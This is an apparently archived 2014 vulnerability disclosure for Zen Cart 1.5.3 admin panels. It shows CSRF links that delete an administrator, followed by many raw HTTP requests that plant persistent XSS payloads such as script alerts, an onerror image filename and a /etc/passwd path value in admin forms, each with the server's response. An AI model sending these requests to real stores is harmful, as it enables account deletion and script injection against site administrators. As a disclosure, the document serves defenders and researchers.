Vulners
Lucene search
Zen Cart 1.5.3 - CSRF & Admin Panel XSS
#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
#Date: 09.07.14
#Vendor: zen-cart.com
#Tested on: Apache 2.2 [at] Linux
#Contact: smash[at]devilteam.pl
#1 - CSRF
- Delete admin
GET profile stands for user id.
localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2
- Reset layout boxes to default
localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults
#2 - Persistent XSS in admin panel
Since admin privileges are required to execute following vulnerablities this is not a serious threat.
- Extras -> Media types -> Add
Vulnerable parameters - type_name & type_exit
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
Content-Length: 663
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="securityToken"
b98019227f8014aed6d22b02f0748d11
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_name"
<h1>sup<!--
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_ext"
sup<>
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="x"
19
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="y"
13
-----------------------------4978676881674017321390852339--
Response:
(...)
<td class="dataTableContent"><h1>sup<!--</td>
<td class="dataTableContent">sup<></td>
<td class="dataTableContent" align="right">
(...)
- Extras -> Media manager -> Add
Vulnerable parameter - media_name
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_manager.php?page=1&mID=1&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------1835318161847256146721022401
Content-Length: 5633
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="securityToken"
b98019227f8014aed6d22b02f0748d11
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_name"
<script>alert(666)</script>
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="x"
32
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="y"
16
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="clip_filename"; filename="cat.png"
Content-Type: image/png
(image)
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_dir"
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_type"
2
-----------------------------1835318161847256146721022401--
Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><strong><script>alert(666)</script></strong></td>
</tr>
- Extras -> Music genre -> Add
Vulenrable parameter - music_genre_name
POST /zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------202746648818048680751007920584
Content-Length: 581
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="securityToken"
b98019227f8014aed6d22b02f0748d11
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="music_genre_name"
<script>alert(666)</script>
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="x"
37
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="y"
10
-----------------------------202746648818048680751007920584--
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?page=1&mID=1&action=edit'">
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)
Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
Response:
(...)
<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
(...)
- Extras -> Record companies -> Add
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_company.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------19884630671863875697751588711
Content-Length: 5828
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="securityToken"
b98019227f8014aed6d22b02f0748d11
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_name"
<script>alert(666)</script>
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image"; filename="<img src=# onerror=alert(1)>.png"
Content-Type: image/png
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="img_dir"
categories/
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image_manual"
/etc/passwd
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_url[1]"
'>"><>XSS
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="x"
21
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="y"
13
-----------------------------19884630671863875697751588711--
Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)
Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
Response:
(...)
<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
<div class="centerColumn" id="indexProductList">
<h1 id="productListHeading"><script>alert(666)</script></h1>
(...)
- Extras -> Recording Artists -> Add
Vulnerable parameter - artists_name
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_artists.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------14015448418946681711346093460
Content-Length: 1099
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="securityToken"
84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_name"
<script>alert(666)</script>
-----------------------------14015448418946681711346093460
(Content-Disposition: form-data; name="artists_image"; filename=""
Content-Type: application/octet-stream
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="img_dir"
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_image_manual"
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_url[1]"
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="x"
39
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="y"
19
-----------------------------14015448418946681711346093460--)
Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)
- Gift Certificate/Coupons -> Coupon admin -> Add
Vulnerable parameters - coupon_name, coupon_desc, coupon_amount, coupon_min_order, coupon_code, coupon_uses_coupon, coupon_uses_user
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
Host: localhost
securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&coupon_name%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_desc%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_amount=%27%3E%22%3E%3C%3EXSSD&coupon_min_order=%27%3E%22%3E%3C%3EXSSD&coupon_free_ship=on&coupon_code=%27%3E%22%3E%3C%3EXSSD&coupon_uses_coupon=%27%3E%22%3E%3C%3EXSSD&coupon_uses_user=%27%3E%22%3E%3C%3EXSSD&coupon_startdate_day=9&coupon_startdate_month=7&coupon_startdate_year=2014&coupon_finishdate_day=9&coupon_finishdate_month=7&coupon_finishdate_year=2015&coupon_zone_restriction=1&x=62&y=10
Response:
(...)
<tr>
<td align="left">Coupon Name</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Coupon Description <br />(Customer can see)</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Coupon Amount</td>
<td align="left"></td>
</tr>
<tr>
<td align="left">Coupon Minimum Order</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Free Shipping</td>
<td align="left">Free Shipping</td>
</tr>
<tr>
<td align="left">Coupon Code</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Uses per Coupon</td>
<td align="left">'>"><>XSSD</td>
</tr>
<tr>
<td align="left">Uses per Customer</td>
<td align="left">'>"><>XSSD</td>
</tr>
(...)
- Gift Certificate/Coupons -> Mail gift certificate -> Send
Vulnerable parameter - email_to
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/gv_mail.php?action=preview HTTP/1.1
Host: localhost
securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&customers_email_address=Active+customers+in+past+3+months+%28Subscribers%29&email_to=%27%3E%22%3E%3C%3EXSSED&from=szit%40szit.in&subject=asdf&amount=666&message=asdf&x=13&y=12
Response:
(...)
</tr>
<tr>
<td class="smallText"><b>Customer:</b><br />'>"><>XSSED</td>
</tr>
<tr>
(...)
- Tools -> Banner manager -> Add
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/banner_manager.php?page=1&action=add HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------3847719184268426731396009422
Content-Length: 2317
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="securityToken"
84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="status"
1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_open_new_windows"
0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_on_ssl"
1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_title"
'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_url"
'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_group"
BannersAll
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="new_banners_group"
'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image"; filename=""
Content-Type: application/octet-stream
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_local"
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_target"
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_html_text"
'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_sort_order"
15
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="date_scheduled"
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_date"
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_impressions"
0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="x"
9
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="y"
7
-----------------------------3847719184268426731396009422--
Response:
(...)
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=10')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title=" View Banner "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">'>"><>XSS</td>
<td class="dataTableContent" align="right">0 / 0</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
- Tools -> Newsletter and Product Notifications Manager -> New newsletter
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?action=insert HTTP/1.1
Host: localhost
securityToken=93867dff1d912bde757ce2bc0ac94425&module=newsletter&title=%27%3E%22%3E%3C%3EXSS&message_html=%27%3E%22%3E%3C%3EXSS&content=%27%3E%22%3E%3C%3EXSS&x=32&y=8
Response:
(...)
<td class="dataTableContent"><a href="http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">18 bytes</td>
(...)
<table border="0" width="100%" cellspacing="0" cellpadding="2">
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
- Tools -> EZ-Pages -> New file
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/ezpages.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------134785397313015614741294511591
Content-Length: 2253
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="securityToken"
c74a83cefbb5ffc1868dd4a390bd0880
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="x"
41
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="y"
17
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_title"
'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="page_open_new_window"
0
-----------------------------134785397313015614741294511591
(...)
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_html_text"
'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url"
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url_external"
-----------------------------134785397313015614741294511591--
Response:
(...)
<td class="dataTableContent" width="75px" align="right">&nbps;1</td>
<td class="dataTableContent">&nbps;'>"><>XSS</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>Title:&nbps;'>"><>XSS&nbps;|&nbps;Prev/Next Chapter:&nbps;0</b></td>
</tr>
(...)
- Localization -> Currencies -> New currency
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/currencies.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&title=%27%3E%22%3E%3C%3EXSS&code=%27%3E%22%3E%3C%3EXSS&symbol_left=%27%3E%22%3E%3C%3EXSS&symbol_right=%27%3E%22%3E%3C%3EXSS&decimal_point=%27%3E%22%3E%3C%3EXSS&thousands_point=%27%3E%22%3E%3C%3EXSS&decimal_places=%27%3E%22%3E%3C%3EXSS&value=%27%3E%22%3E%3C%3EXSS&x=13&y=15
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
<tr>
<td class="infoBoxContent"><br>Title: '>"><>XSS</td>
</tr>
<tr>
<td class="infoBoxContent">Code: '>"</td>
</tr>
<tr>
<td class="infoBoxContent"><br>Symbol Left: '>"><>XSS</td>
</tr>
<tr>
<td class="infoBoxContent">Symbol Right: '>"><>XSS</td>
</tr>
(...)
<tr>
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
</tr>
</table>
(...)
<tr>
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
</tr>
- Localization -> Languages -> New language
Affects big part of admin panel.
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/languages.php?action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&name=%27%3E%22%3E%3C%3EXSS&code=xs&image=icon.gif&directory=%27%3E%22%3E%3C%3EXSS&sort_order=%27%3E%22%3E%3C%3EXSS&x=40&y=20
Response:
(...)
<td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbps;MISSING LANGUAGE FILES OR DIRECTORIES ... '>"><>XSS '>"><>XSS</td>
</tr>
</table>
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">xs</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
<tr>
<td class="infoBoxContent"><br>Name: '>"><>XSS</td>
</tr>
<tr>
<td class="infoBoxContent">Code: xs</td>
</tr>
<tr>
<td class="infoBoxContent"><br><img src="http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/'>"><>XSS/images/icon.gif" border="0" alt="'>"><>XSS" title=" '>"><>XSS "></td>
</tr>
<tr>
<td class="infoBoxContent"><br>Directory:<br>http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/<b>'>"><>XSS</b></td>
</tr>
(...)
Further injection:
http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php
- Localization -> Orders status -> Insert
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS&x=9&y=7
Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&oID=5&action=edit'">
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbps;</td>
(...)
- Locations / Taxes -> Zones -> New zone
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/zones.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&zone_name=%27%3E%22%3E%3C%3EXSS&zone_code=%27%3E%22%3E%3C%3EXSS&zone_country_id=247&x=17&y=11
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="center">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
</table>
(...)
<tr>
<td class="infoBoxContent"><br>Zones Name:<br>'>"><>XSS ('>"><>XSS)</td>
</tr>
<tr>
<td class="infoBoxContent"><br>Country: '>"><>XSS</td>
- - Locations / Taxes -> Zone definitions -> Insert
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&geo_zone_name=%27%3E%22%3E%3C%3EXSS&geo_zone_description=%27%3E%22%3E%3C%3EXSS&x=25&y=13
Response:
(...)
</a>&nbps;'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
- Locations / Taxes -> Tax Classes -> New tax class
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_classes.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_title=%27%3E%22%3E%3C%3EXSS&tax_class_description=%27%3E%22%3E%3C%3EXSS&x=33&y=9
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)
- - Locations / Taxes -> Tax Rates -> New tax rate
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_rates.php?page=1&action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_id=2&tax_zone_id=2&tax_rate=66&tax_description=%27%3E%22%3E%3C%3EXSS&tax_priority=&x=32&y=16
Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">66%</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)
- Customers -> Group Pricing -> Insert
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/group_pricing.php?action=insert HTTP/1.1
Host: localhost
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&group_name=%27%3E%22%3E%3C%3EXSS&group_percentage=%27%3E%22%3E%3C%3EXSS&x=10&y=9
Response:
(...)
<td class="dataTableContent">1</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">0.00</td>
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
</tr>
(...)
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1